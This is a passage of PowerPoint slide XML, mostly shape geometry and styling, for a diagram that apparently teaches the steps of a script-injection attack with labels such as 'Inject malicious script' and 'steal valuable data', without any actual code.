            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2148926" y="4140789"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4356419"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4322292"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854825" y="3291840"/>
            <a:ext cx="1052830" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4724400"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="4731702"/>
            <a:ext cx="2123440" cy="1787525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>execute script  embedded in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as though server  meant us to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979613" y="5049837"/>
            <a:ext cx="2740025" cy="989330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2740025" h="989329">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2739988" y="989098"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664177" y="5983512"/>
            <a:ext cx="122530" cy="89026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2223650" y="5196045"/>
            <a:ext cx="2634821" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="5555" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840027" y="4624502"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840027" y="4624502"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="1904451" y="4678952"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="2449371"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115752" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5387416" y="2410386"/>
            <a:ext cx="121634" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3044399" y="2341930"/>
            <a:ext cx="2117141" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>steal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>valuable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="5555" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="5555">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640013" y="2582863"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
